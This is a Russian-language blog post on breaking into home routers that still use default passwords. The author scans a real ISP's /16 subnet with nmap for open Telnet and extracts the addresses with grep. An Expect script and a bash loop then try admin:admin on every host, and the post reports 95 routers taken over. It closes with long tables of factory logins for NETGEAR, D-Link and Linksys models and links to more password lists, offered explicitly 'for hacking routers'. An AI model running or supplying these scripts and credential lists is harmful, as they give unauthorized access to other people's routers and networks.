Взлом роутеров со страндартными паролями

Недавно мне пришла в голову банальная мысль, что большинство людей не уделяют внимания настройке своих роутеров, и на них можно зайти по дефолтным паролям. А много ли таких роутеров вдобавок открыты для входа из интернета, что делает их проходным двором? И как это по-быстрому проверить? 

Итак, задача: просканировать какую-нибудь подсеть и найти уязвимые роутеры.

Условия выполнения: не более нескольких часов (на дворе всё-таки лето), используя только стандартные средства системы Linux. Да, я в курсе про проекты типа Kali и вагоны «хакерского» софта в них, но найти нужную программу, которая сделала бы это прямо «из коробки» мне сходу не удалось, а время-то идёт… Да и интереснее самому.

Первая мысль, которая приходит в голову: сканировать nmap’ом по открытому 80 порту. Но что делать с огромным зоопарком веб-морд? Ведь цель — не написать универсальный комбайн-уничтожитель роутеров, а небольшой proof-of-concept. А нет ли какой-нибудь унифицированной системы авторизации на роутерах? Конечно же есть — Telnet! Начинаем!

Выбираем жертв: вводим в Google «имя_провайдера диапазон адресов». Я выбрал провайдера на букву «У» и одну из его подсетей вида XX.XX.00.00/16, то есть ни много ни мало ~65536 адресов.

nmap --open XX.XX.0.0/16 -p 23 > raw_log.txt

 Так мы ищем роутеры (и любые другие железки) с открытым 23 портом (Telnet), а ключ --open позволяет вывести только нужные адреса, что упрощает дальнейшую обработку.

Проходит немногим более 40 минут, и список из 2100 адресов у нас на рабочем столе. А всего было доступными 18000 хостов.

Для наших целей выхлоп nmap слишком пёстрый, его скрипту не скормишь, нужно отсеять только адреса. С этим справится незаменимый grep, а именно:

grep -o -E '([0-9]{1,3}[.]){3}[0-9]{1,3}' raw_log.txt > log.txt

 Регулярное выражение может испугать начинающего греповца, но на самом деле оно очень простое: блок вида «от одной до трёх цифр + точка» трижды + блок «от одной до трёх цифр». Ключ -o выводит только найденную подстроку, что нам и требуется.

Можно немного отдохнуть и поподключаться вручную к данным IP с помощью telnet. Кое-где соединение обрывается, но много где и подключается. Более того, из десятка попробованных IP уже два оказалось рабочими роутерами с автоматическим логином и паролем admin, что не может не радовать.

Кто-то бы на этом остановился, но только не мы, ведь наша цель — не похозяйничать в чужих роутерах, а более возвышенная — статистическое исследование.

Попытки автоматизации telnet’а «в лоб» не увенчались успехом: просто так его в bash-скрипт завернуть не удавалось. Проблема была в автоматической подстановке пароля: все известные мне способы (пайпы, эхи и кэты) здесь не сработали. Пришлось открывать для себя способы неизвестные: Expect — инструмент для автоматизации и тестирования в ОС Unix, написанный Don Libes как расширение к скрипт-языку Tcl, для интерактивных приложений таких, как telnet, ftp, passwd, fsck, rlogin, tip, ssh, и других. В статье из википедии первым же примером приводится автоматическая авторизация по telnet — ну просто подарок. Код пришлось немного «подпилить» под свои нужды, вот уже готовое тело программы для перебора: исполняемый файл try_telnet

#!/usr/bin/expect -f set SERVER [lindex $argv 0]; set USER [lindex $argv 1]; set PASS [lindex $argv 2]; set timeout 1 spawn telnet $SERVER expect ":" send "$USERr" expect ":" send "$PASSr" expect ">" {puts "nFOUND $SERVER $USER:$PASSn"; exit 0} exit 1

 Команда expect следует своему буквальному значению: ждёт приглашения на ввод логина и пароля, а потом и ввода команд. Если получен шелл, то скрипт радостно рапортует об этом в общий поток вывода строкой, которую потом удобно грепать.

Интересный факт: в Википедии и других ресурсах в качестве маркера шелла указан «#». Путём экспериментов выяснилось, что этот способ не работает на большой доле уязвимых роутеров, а именно TP-LINK, которые дают приглашение на ввод команд вида

TP-LINK>

 Однако маркер «>» универсален — он работает и на узявимых D-Link, которые дают приглашение вида

DSL-2600U#

 Осталось только написать однострочный bash: исполняемый файл brute

#!/bin/bash while read line; do ./try_telnet $line admin admin; done < log.txt

 И запускаем

./brute > out.txt

 В stderr скрипт ругается в случае connection refused — не обращайте внимания. Полезную работу скрипта можно вживую наблюдать в файле out.txt (не забывая его периодически обновлять).

Проходит 35 минут и скрипт завершает работу. Просеиваем результат с помощью 

grep 'FOUND' out.txt > final.txt

 Получаем 95 роутеров с авторизацией admin:admin — цель достигнута. 

В итоге из 18000 адресов оказалось 95 роутеров, на которые из любой точки земного шара можно зайти по admin:admin. Веб-интерфейс у всех тоже открыт. Много это или мало? Напоминаю, что мы искали лишь роутеры с открытым telnet, и попробовали лишь одну стандартную связку для авторизации (хоть и самую распространённую).

В основном оказались уязвимы роутеры TP-LINK и D-link различных моделей. Если у вас такой роутер, то его стоит проверить! Также нашлось несколько ZyXEL, Huawei, Asotel, ZTE.

Также вы можете проделать данную операцию с помощью программы RouterScan

Для взлом роутеров вам наверняка понадобится список стандартных паролей роутеров:

Таблица стандартных паролей для роутеров(маршрутизатор) производителя NETGEAR:

Модель Протокол Логин Пароль 
NETGEAR RM356 Rev. NONE TELNET (none) 1234 
NETGEAR WGT624 Rev. 2 HTTP admin password 
NETGEAR COMCAST Rev. COMCAST-SUPPLIED HTTP comcast 1234 
NETGEAR FR314 HTTP admin password 
NETGEAR MR-314 Rev. 3.26 HTTP admin 1234 
NETGEAR RT314 HTTP admin admin 
NETGEAR RP614 HTTP admin password 
NETGEAR RP114 Rev. 3.26 TELNET (none) 1234 
NETGEAR WG602 Rev. FIRMWARE VERSION 1.04.0 HTTP super 5777364 
NETGEAR WG602 Rev. FIRMWARE VERSION 1.7.14 HTTP superman 21241036 
NETGEAR WG602 Rev. FIRMWARE VERSION 1.5.67 HTTP super 5777364 
NETGEAR MR814 HTTP admin password 
NETGEAR FVS318 HTTP admin password 
NETGEAR DM602 FTP TELNET AND HTTP admin password 
NETGEAR FR114P HTTP admin password 
NETGEAR ME102 SNMP (none) private 
NETGEAR WGR614 Rev. V4 MULTI admin password 
NETGEAR RP114 Rev. 3.20-3.26 HTTP admin 1234 
NETGEAR DG834G HTTP admin password 
NETGEAR ROUTER/MODEM MULTI admin password 
NETGEAR MR314 MULTI admin 1234 
NETGEAR GSM7224 HTTP admin (none) 
NETGEAR ADSL MODEM DG632 Rev. V3.3.0A_CX HTTP admin password 
NETGEAR WGT634U HTTP admin password 
NETGEAR FWG114P MULTI n/a admin 
NETGEAR GS724T Rev. V1.0.1_1104 HTTP n/a password 
NETGEAR FM114P MULTI n/a (none) 
NETGEAR DG834 admin password 
NETGEAR WNR834 BV2 admin password 
NETGEAR WNR834BV2 HTTP admin password 
NETGEAR WPN824 / WPN824V2 HTTP admin password

Таблица стандартных паролей для роутеров(маршрутизатор) D LINK:

Производитель Модель Протокол Логин Пароль 
D-LINK DSL-G664T Rev. A1 HTTP admin admin 
D-LINK HUBS/SWITCHES TELNET D-Link D-Link 
D-LINK DI-704 Rev. REV A MULTI (none) admin 
D-LINK DI-804 Rev. V2.03 MULTI admin (none) 
D-LINK DWL 900AP MULTI (none) public 
D-LINK DI-614+ HTTP user (none) 
D-LINK DWL-614+ Rev. REV A REV B HTTP admin (none) 
D-LINK D-704P Rev. REV B MULTI admin (none) 
D-LINK DI-604 Rev. REV A REV B REV C REV E MULTI admin (none) 
D-LINK DWL-614+ Rev. 2.03 HTTP admin (none) 
D-LINK D-704P MULTI admin admin 
D-LINK DWL-900+ HTTP admin (none) 
D-LINK DI-704 MULTI n/a admin 
D-LINK DI-604 Rev. 1.62B+ HTTP admin (none) 
D-LINK DI-624 Rev. ALL HTTP admin (none) 
D-LINK DI-624 Rev. ALL HTTP User (none) 
D-LINK DI-604 Rev. 2.02 HTTP admin admin 
D-LINK DWL 1000 HTTP admin (none) 
D-LINK DI-514 MULTI user (none) 
D-LINK DI-614+ Rev. ANY HTTP admin (none) 
D-LINK DWL 2100AP MULTI admin (none) 
D-LINK DSL-302G MULTI admin admin 
D-LINK DI-624+ Rev. A3 HTTP admin admin 
D-LINK DWL-2000AP+ Rev. 1.13 HTTP admin (none) 
D-LINK DI-614+ HTTP admin admin 
D-LINK DSL-300G+ Rev. TEO TELNET (none) private 
D-LINK DSL-300G+ Rev. TEO HTTP admin admin 
D-LINK DI-524 Rev. ALL HTTP admin (none) 
D-LINK FIREWALL Rev. DFL-200 HTTP admin admin 
D-LINK DI-524 Rev. ALL HTTP user (none) 
D-LINK DWL-900AP+ Rev. REV A REV B REV C HTTP admin (none) 
D-LINK DSL500G MULTI admin admin 
D-LINK DSL-504T HTTP admin admin 
D-LINK DSL-G604T MULTI admin admin 
D-LINK DI-707P ROUTER HTTP admin (none) 
D-LINK DI624 Rev. C3 HTTP admin password 
D-LINK 604 MULTI n/a admin 
D-LINK DSL-500 MULTI admin admin 
D-LINK 504G ADSL ROUTER HTTP admin admin 
D-LINK DI-524 HTTP admin (none) 
D-LINK ADSL HTTP admin admin 
D-LINK VWR (VONAGE) Rev. WIRELESS BROADBAND ROUTER HTTP user user 
D-LINK DGL4300 Rev. D-LINK’S DGL-4300 GAME SERIES ROUTER HTTP Admin (none) 
D-LINK VTA (VONAGE) HTTP user user

Таблица стандартных паролей для роутеров(маршрутизатор) LINKSYS:

Производитель Модель Протокол Логин Пароль 
LINKSYS WAP11 MULTI n/a (none) 
LINKSYS DSL TELNET n/a admin 
LINKSYS ETHERFAST CABLE/DSL ROUTER MULTI Administrator admin 
LINKSYS LINKSYS ROUTER DSL/CABLE HTTP (none) admin 
LINKSYS BEFW11S4 Rev. 1 HTTP admin (none) 
LINKSYS BEFSR41 Rev. 2 HTTP (none) admin 
LINKSYS WRT54G HTTP admin admin 
LINKSYS WAG54G HTTP admin admin 
LINKSYS LINKSYS DSL n/a admin 
LINKSYS WAP54G Rev. 2.0 HTTP (none) admin 
LINKSYS WRT54G Rev. ALL REVISIONS HTTP (none) admin 
LINKSYS MODEL WRT54GC COMPACT WIRELESS-G BROADBAND ROUTER MULTI (none) admin 
LINKSYS AG 241 – ADSL2 GATEWAY WITH 4-PORT SWITCH MULTI admin admin 
LINKSYS COMCAST Rev. COMCAST-SUPPLIED HTTP comcast 1234 
LINKSYS WAG54GS MULTI admin admin 
LINKSYS AP 1120 MULTI n/a (none) 
LINKSYS PAP2 / PAP2V2 (VONAGE) HTTP admin admin 
LINKSYS RT31P2 (VONAGE) HTTP admin admin 
LINKSYS RTP300 (VONAGE) HTTP admin admin 
LINKSYS WRT54GP2 (VONAGE) HTTP admin admin 
LINKSYS WRTP54G (VONAGE) HTTP admin admin
------------------------------------------------------
Также пароли по умолчанию можно узнать здесь:
http://www.phenoelit-us.org/dpl/dpl.html
http://someshit.net/mdplrmp.html
http://www.redoracle.com/index.php?option=com_password&task=rlist
http://www.cirt.net/cgi-bin/passwd.pl
http://www.cyxla.com/passwords/index.php
http://www.virus.org/default-password/view/
http://defaultpassword.com/

Прекрассный ресурс для определения пароля по умолчанию для роутера — RouterPasswords.com

Здесь вы можете найти пароли практически для всех существующих моделей роутеров